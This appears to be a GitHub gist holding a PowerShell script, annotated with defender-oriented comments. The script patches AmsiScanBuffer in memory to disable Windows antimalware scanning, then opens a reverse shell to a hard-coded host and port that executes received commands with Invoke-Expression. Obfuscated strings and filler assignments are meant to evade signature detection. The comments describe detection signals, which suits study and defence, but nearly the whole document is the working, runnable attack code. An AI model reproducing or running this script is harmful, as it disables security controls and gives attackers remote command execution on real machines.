@navaneeth-dev
Created March 29, 2022 04:32
powershell UD amsi revshell script
# Rasta Mouse's AmsiScanBuffer patch (original header comment; the trailing literal "\n" was a paste artefact).
#
# What this script does, in order:
#   1. Compiles a small C# P/Invoke shim with Add-Type, locates the AMSI scan export in this
#      process, makes its page writable and overwrites its first bytes so the export returns an
#      error immediately instead of scanning. The effect is limited to this PowerShell process.
#   2. Opens a TCP connection to a hard-coded host/port and runs every received chunk through
#      Invoke-Expression, sending output (and errors) back with a fake "PS path>" prompt.
#
# Defender / detection notes (based only on what is visible below):
#   - Add-Type compiling C# that DllImports LoadLibrary + GetProcAddress + VirtualProtect from
#     kernel32 is a strong behavioural signal on its own; the char-arithmetic only obfuscates the
#     two strings, not the API calls.
#   - Script block logging (event 4104) does not depend on AMSI, so the text of this script is
#     still recorded even after the in-process patch lands.
#   - Constrained Language Mode prevents Add-Type; a write to a loaded amsi.dll code page is
#     observable by EDR memory-integrity checks; the TCPClient to a fixed IP:port plus iex on
#     socket data is the network/behaviour pair a rule should key on.
#   - The many `$fsdf = 1` assignments are never read; they are filler, presumably to alter
#     the script's static signature.

# C# shim compiled at runtime. The here-string is a runtime literal and is reproduced verbatim
# (the odd parameter name "epfkrh" is just a renamed size argument for VirtualProtect).
$ynfhj = @"
using System;
using System.Runtime.InteropServices;
public class ynfhj {
[DllImport("kernel32")]
public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
[DllImport("kernel32")]
public static extern IntPtr LoadLibrary(string name);
[DllImport("kernel32")]
public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr epfkrh, uint flNewProtect, out uint lpflOldProtect);
}
"@
Add-Type $ynfhj
# The char arithmetic below evaluates to "amsi.dll" (the library named in the header); the call
# itself is an ordinary LoadLibrary, so the obfuscation only defeats naive string matching.
$gjrnhhu = [ynfhj]::LoadLibrary("$([CHAr]([byte]0x61)+[chAr](109*41/41)+[cHAr](115*88/88)+[char](105+33-33)+[CHAR](10+36)+[chaR]([BYTe]0x64)+[cHaR](108)+[CHAR](108*49/49))")
# Resolves the export whose name decodes to "AmsiScanBuffer"; $veratw is its address in this process.
$veratw = [ynfhj]::GetProcAddress($gjrnhhu, "$([CHaR]([bYTE]0x41)+[cHAR](83+26)+[chAR](46+69)+[chAr]([bYte]0x69)+[chaR]([BYte]0x53)+[chaR]([ByTe]0x63)+[ChAr](69+28)+[cHaR]([bYTE]0x6e)+[Char]([BYTE]0x42)+[cHAR](117)+[Char](102)+[cHAR]([bYte]0x66)+[CHAR]([BytE]0x65)+[ChaR]([bYTE]0x72))")
# $p receives the previous page protection; $qcjh is the first byte of the patch.
$p = 0
$qcjh = "0xB8"
# 0x40 is PAGE_EXECUTE_READWRITE, applied to 5 bytes at the export address. Note the size here (5)
# is smaller than the 6 bytes written below, and the boolean return value is not checked.
[ynfhj]::VirtualProtect($veratw, [uint32]5, 0x40, [ref]$p)
# Remaining patch bytes, declared out of order so the array literal reads differently from the
# byte sequence actually written.
$fkyv = "0xC3"
$gbjf = "0x57"
$iton = "0x07"
$wran = "0x00"
$bgml = "0x80"
# Assembles the 6-byte patch. The "+$bgml"/"+$fkyv" entries are unary plus (string -> int) and do
# not change the values. The result makes the export return at once with an error result rather
# than scanning, which is what disables AMSI for the remainder of this process.
$uggea = [Byte[]] ($qcjh,$gbjf,$wran,$iton,+$bgml,+$fkyv)
$mom = [System.Runtime.InteropServices.Marshal]
# Writes the patch over the export. No error handling: if VirtualProtect failed above this write
# would presumably fault the process.
$mom::Copy($uggea, 0, $veratw, 6)
# Reverse shell. The endpoint is hard-coded (values as given on the page) — the literal IP/port and
# the TCPClient type are the network indicators to look for.
$fghn = New-Object System.Net.Sockets.TCPClient('192.168.0.112', 4444)
# Filler assignment; $fsdf is never read anywhere in the script.
$fsdf = 1
$dsfsdf = $fghn.GetStream()
# 64 KiB receive buffer.
[byte[]]$bytes = 0..65535|%{0}
# Loop until the peer closes the connection; each chunk is ASCII-decoded and executed as-is.
while(($i = $dsfsdf.Read($bytes, 0, $bytes.Length)) -ne 0) {
$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i)
$fsdf = 1
# Invoke-Expression on remote-supplied text; 2>&1 folds the error stream into the reply.
$sendback = (iex $data 2>&1 | Out-String )
$fsdf = 1
# Appends a fake interactive prompt showing the current directory.
$sendback2 = $sendback + 'PS ' + (pwd).Path + '> '
$fsdf = 1
# Encode and send the reply back over the same stream.
$sdfsdfds = ([text.encoding]::ASCII).GetBytes($sendback2)
$fsdf = 1
$len = $sdfsdfds.Length
$dsfsdf.Write($sdfsdfds, 0, $len)
$dsfsdf.Flush()
}
# Closes the socket once the peer has disconnected.
$fghn.Close()